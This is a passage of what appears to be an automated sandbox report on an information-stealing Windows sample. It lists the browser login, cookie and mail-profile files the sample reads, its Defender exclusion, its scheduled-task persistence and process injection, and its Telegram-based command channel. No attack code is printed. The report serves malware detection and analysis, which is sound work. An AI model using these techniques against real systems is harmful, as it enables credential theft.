                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.Management.Infrastructure.Native\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.Native.dll VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\OtldpQxzAw.exeQueries volume information: C:\Users\user\Desktop\OtldpQxzAw.exe VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\OtldpQxzAw.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\OtldpQxzAw.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\OtldpQxzAw.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Web.Extensions\v4.0_4.0.0.0__31bf3856ad364e35\System.Web.Extensions.dll VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\OtldpQxzAw.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\OtldpQxzAw.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Web\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Web.dll VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\OtldpQxzAw.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\OtldpQxzAw.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformationJump to behavior
                Source: C:\Users\user\AppData\Roaming\wiSeRRwvZHTk.exeQueries volume information: C:\Users\user\AppData\Roaming\wiSeRRwvZHTk.exe VolumeInformationJump to behavior
                Source: C:\Users\user\AppData\Roaming\wiSeRRwvZHTk.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
                Source: C:\Users\user\AppData\Roaming\wiSeRRwvZHTk.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformationJump to behavior
                Source: C:\Users\user\AppData\Roaming\wiSeRRwvZHTk.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformationJump to behavior
                Source: C:\Users\user\AppData\Roaming\wiSeRRwvZHTk.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformationJump to behavior
                Source: C:\Users\user\AppData\Roaming\wiSeRRwvZHTk.exeQueries volume information: C:\Users\user\AppData\Roaming\wiSeRRwvZHTk.exe VolumeInformation
                Source: C:\Users\user\AppData\Roaming\wiSeRRwvZHTk.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
                Source: C:\Users\user\AppData\Roaming\wiSeRRwvZHTk.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation
                Source: C:\Users\user\AppData\Roaming\wiSeRRwvZHTk.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Web.Extensions\v4.0_4.0.0.0__31bf3856ad364e35\System.Web.Extensions.dll VolumeInformation
                Source: C:\Users\user\AppData\Roaming\wiSeRRwvZHTk.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformation
                Source: C:\Users\user\AppData\Roaming\wiSeRRwvZHTk.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Web\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Web.dll VolumeInformation
                Source: C:\Users\user\AppData\Roaming\wiSeRRwvZHTk.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
                Source: C:\Users\user\AppData\Roaming\wiSeRRwvZHTk.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation
                Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformation
                Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformation
                Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformation
                Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformation
                Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformation
                Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformation
                Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformation
                Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformation
                Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.jfm VolumeInformation
                Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformation
                Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformation
                Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ VolumeInformation
                Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ VolumeInformation
                Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformation
                Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformation
                Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformation
                Source: C:\Users\user\Desktop\OtldpQxzAw.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior

                Stealing of Sensitive Information

                barindex
                Source: Yara matchFile source: 0000000E.00000002.3306390132.00000000030F1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000009.00000002.3307087462.0000000002AC1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 10.2.wiSeRRwvZHTk.exe.4ad4a08.2.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 10.2.wiSeRRwvZHTk.exe.4cb4458.1.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 0.2.OtldpQxzAw.exe.4297268.1.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 10.2.wiSeRRwvZHTk.exe.4cb4458.1.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 0.2.OtldpQxzAw.exe.4253448.3.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 0.2.OtldpQxzAw.exe.4297268.1.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 0.2.OtldpQxzAw.exe.4253448.3.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 10.2.wiSeRRwvZHTk.exe.4ad4a08.2.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 0000000E.00000002.3306390132.00000000032DC000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 0000000A.00000002.955729902.0000000004CB4000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000009.00000002.3307087462.0000000002CAC000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000000.00000002.903173734.0000000004253000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 0000000A.00000002.955729902.0000000004AD4000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: Process Memory Space: OtldpQxzAw.exe PID: 6416, type: MEMORYSTR
                Source: Yara matchFile source: Process Memory Space: OtldpQxzAw.exe PID: 808, type: MEMORYSTR
                Source: Yara matchFile source: Process Memory Space: wiSeRRwvZHTk.exe PID: 2664, type: MEMORYSTR
                Source: Yara matchFile source: Process Memory Space: wiSeRRwvZHTk.exe PID: 5172, type: MEMORYSTR
                Source: Yara matchFile source: 10.2.wiSeRRwvZHTk.exe.4ad4a08.2.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 10.2.wiSeRRwvZHTk.exe.4cb4458.1.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 0.2.OtldpQxzAw.exe.4297268.1.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 10.2.wiSeRRwvZHTk.exe.4cb4458.1.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 0.2.OtldpQxzAw.exe.4253448.3.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 0.2.OtldpQxzAw.exe.4297268.1.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 0.2.OtldpQxzAw.exe.4253448.3.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 10.2.wiSeRRwvZHTk.exe.4ad4a08.2.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 00000009.00000002.3301331554.000000000042E000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 0000000A.00000002.955729902.0000000004CB4000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000000.00000002.903173734.0000000004253000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 0000000A.00000002.955729902.0000000004AD4000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: Process Memory Space: OtldpQxzAw.exe PID: 6416, type: MEMORYSTR
                Source: Yara matchFile source: Process Memory Space: OtldpQxzAw.exe PID: 808, type: MEMORYSTR
                Source: Yara matchFile source: Process Memory Space: wiSeRRwvZHTk.exe PID: 2664, type: MEMORYSTR
                Source: C:\Users\user\AppData\Roaming\wiSeRRwvZHTk.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\History
                Source: C:\Users\user\AppData\Roaming\wiSeRRwvZHTk.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\History
                Source: C:\Users\user\AppData\Roaming\wiSeRRwvZHTk.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data
                Source: C:\Users\user\AppData\Roaming\wiSeRRwvZHTk.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data
                Source: C:\Users\user\AppData\Roaming\wiSeRRwvZHTk.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies
                Source: C:\Users\user\AppData\Roaming\wiSeRRwvZHTk.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
                Source: C:\Users\user\AppData\Roaming\wiSeRRwvZHTk.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Top Sites
                Source: C:\Users\user\AppData\Roaming\wiSeRRwvZHTk.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\Cookies
                Source: C:\Users\user\Desktop\OtldpQxzAw.exeFile opened: C:\Users\user\AppData\Roaming\PostboxApp\Profiles\Jump to behavior
                Source: C:\Users\user\Desktop\OtldpQxzAw.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676Jump to behavior
                Source: C:\Users\user\AppData\Roaming\wiSeRRwvZHTk.exeFile opened: C:\Users\user\AppData\Roaming\PostboxApp\Profiles\
                Source: C:\Users\user\AppData\Roaming\wiSeRRwvZHTk.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676
                Source: Yara matchFile source: 10.2.wiSeRRwvZHTk.exe.4ad4a08.2.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 10.2.wiSeRRwvZHTk.exe.4cb4458.1.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 0.2.OtldpQxzAw.exe.4297268.1.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 10.2.wiSeRRwvZHTk.exe.4cb4458.1.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 0.2.OtldpQxzAw.exe.4253448.3.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 0.2.OtldpQxzAw.exe.4297268.1.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 0.2.OtldpQxzAw.exe.4253448.3.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 10.2.wiSeRRwvZHTk.exe.4ad4a08.2.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 0000000A.00000002.955729902.0000000004CB4000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000009.00000002.3301331554.0000000000439000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000000.00000002.903173734.0000000004253000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 0000000A.00000002.955729902.0000000004AD4000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: Process Memory Space: OtldpQxzAw.exe PID: 6416, type: MEMORYSTR
                Source: Yara matchFile source: Process Memory Space: OtldpQxzAw.exe PID: 808, type: MEMORYSTR
                Source: Yara matchFile source: Process Memory Space: wiSeRRwvZHTk.exe PID: 2664, type: MEMORYSTR
                Source: Yara matchFile source: Process Memory Space: wiSeRRwvZHTk.exe PID: 5172, type: MEMORYSTR

                Remote Access Functionality

                barindex
                Source: Yara matchFile source: 0000000E.00000002.3306390132.00000000030F1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000009.00000002.3307087462.0000000002AC1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 10.2.wiSeRRwvZHTk.exe.4ad4a08.2.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 10.2.wiSeRRwvZHTk.exe.4cb4458.1.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 0.2.OtldpQxzAw.exe.4297268.1.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 10.2.wiSeRRwvZHTk.exe.4cb4458.1.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 0.2.OtldpQxzAw.exe.4253448.3.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 0.2.OtldpQxzAw.exe.4297268.1.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 0.2.OtldpQxzAw.exe.4253448.3.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 10.2.wiSeRRwvZHTk.exe.4ad4a08.2.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 0000000E.00000002.3306390132.00000000032DC000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 0000000A.00000002.955729902.0000000004CB4000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000009.00000002.3307087462.0000000002CAC000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000000.00000002.903173734.0000000004253000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 0000000A.00000002.955729902.0000000004AD4000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: Process Memory Space: OtldpQxzAw.exe PID: 6416, type: MEMORYSTR
                Source: Yara matchFile source: Process Memory Space: OtldpQxzAw.exe PID: 808, type: MEMORYSTR
                Source: Yara matchFile source: Process Memory Space: wiSeRRwvZHTk.exe PID: 2664, type: MEMORYSTR
                Source: Yara matchFile source: Process Memory Space: wiSeRRwvZHTk.exe PID: 5172, type: MEMORYSTR
                Source: Yara matchFile source: 10.2.wiSeRRwvZHTk.exe.4ad4a08.2.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 10.2.wiSeRRwvZHTk.exe.4cb4458.1.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 0.2.OtldpQxzAw.exe.4297268.1.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 10.2.wiSeRRwvZHTk.exe.4cb4458.1.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 0.2.OtldpQxzAw.exe.4253448.3.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 0.2.OtldpQxzAw.exe.4297268.1.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 0.2.OtldpQxzAw.exe.4253448.3.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 10.2.wiSeRRwvZHTk.exe.4ad4a08.2.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 00000009.00000002.3301331554.000000000042E000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 0000000A.00000002.955729902.0000000004CB4000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000000.00000002.903173734.0000000004253000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 0000000A.00000002.955729902.0000000004AD4000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: Process Memory Space: OtldpQxzAw.exe PID: 6416, type: MEMORYSTR
                Source: Yara matchFile source: Process Memory Space: OtldpQxzAw.exe PID: 808, type: MEMORYSTR
                Source: Yara matchFile source: Process Memory Space: wiSeRRwvZHTk.exe PID: 2664, type: MEMORYSTR
                ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
                Gather Victim Identity InformationAcquire InfrastructureValid Accounts1
                Scheduled Task/Job
                1
                DLL Side-Loading
                1
                DLL Side-Loading
                11
                Disable or Modify Tools
                1
                OS Credential Dumping
                1
                File and Directory Discovery
                Remote Services11
                Archive Collected Data
                1
                Web Service
                Exfiltration Over Other Network MediumAbuse Accessibility Features
                CredentialsDomainsDefault AccountsScheduled Task/Job1
                Scheduled Task/Job
                111
                Process Injection
                1
                Deobfuscate/Decode Files or Information
                LSASS Memory23
                System Information Discovery
                Remote Desktop Protocol1
                Data from Local System
                3
                Ingress Tool Transfer
                Exfiltration Over BluetoothNetwork Denial of Service
                Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)1
                Scheduled Task/Job
                3
                Obfuscated Files or Information
                Security Account Manager111
                Security Software Discovery
                SMB/Windows Admin Shares1
                Email Collection
                11
                Encrypted Channel
                Automated ExfiltrationData Encrypted for Impact
                Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook12
                Software Packing
                NTDS1
                Process Discovery
                Distributed Component Object ModelInput Capture4
                Non-Application Layer Protocol
                Traffic DuplicationData Destruction
                Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script1
                Timestomp
                LSA Secrets41
                Virtualization/Sandbox Evasion
                SSHKeylogging15
                Application Layer Protocol
                Scheduled TransferData Encrypted for Impact
                Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts1
                DLL Side-Loading
                Cached Domain Credentials1
                Application Window Discovery
                VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
                DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items11
                Masquerading
                DCSync1
                System Network Configuration Discovery
                Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
                Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job41
                Virtualization/Sandbox Evasion
                Proc FilesystemSystem Owner/User DiscoveryCloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement
                Network TopologyMalvertisingExploit Public-Facing ApplicationCommand and Scripting InterpreterAtAt111
                Process Injection
                /etc/passwd and /etc/shadowNetwork SniffingDirect Cloud VM ConnectionsData StagedWeb ProtocolsExfiltration Over Symmetric Encrypted Non-C2 ProtocolInternal Defacement
                Hide Legend

                Legend:

                • Process
                • Signature
                • Created File
                • DNS/IP Info
                • Is Dropped
                • Is Windows Process
                • Number of created Registry Values
                • Number of created Files
                • Visual Basic
                • Delphi
                • Java
                • .Net C# or VB.NET
                • C, C++ or other language
                • Is malicious
                • Internet
                behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1632374 Sample: OtldpQxzAw.exe Startdate: 07/03/2025 Architecture: WINDOWS Score: 100 49 reallyfreegeoip.org 2->49 51 api.telegram.org 2->51 53 2 other IPs or domains 2->53 69 Suricata IDS alerts for network traffic 2->69 71 Found malware configuration 2->71 73 Malicious sample detected (through community Yara rule) 2->73 79 11 other signatures 2->79 8 OtldpQxzAw.exe 7 2->8         started        12 wiSeRRwvZHTk.exe 5 2->12         started        14 svchost.exe 2->14         started        signatures3 75 Tries to detect the country of the analysis system (by using the IP) 49->75 77 Uses the Telegram API (likely for C&C communication) 51->77 process4 dnsIp5 41 C:\Users\user\AppData\...\wiSeRRwvZHTk.exe, PE32 8->41 dropped 43 C:\Users\...\wiSeRRwvZHTk.exe:Zone.Identifier, ASCII 8->43 dropped 45 C:\Users\user\AppData\Local\...\tmp53CF.tmp, XML 8->45 dropped 47 C:\Users\user\AppData\...\OtldpQxzAw.exe.log, ASCII 8->47 dropped 81 Uses schtasks.exe or at.exe to add and modify task schedules 8->81 83 Adds a directory exclusion to Windows Defender 8->83 85 Injects a PE file into a foreign processes 8->85 17 powershell.exe 23 8->17         started        20 OtldpQxzAw.exe 15 2 8->20         started        23 powershell.exe 23 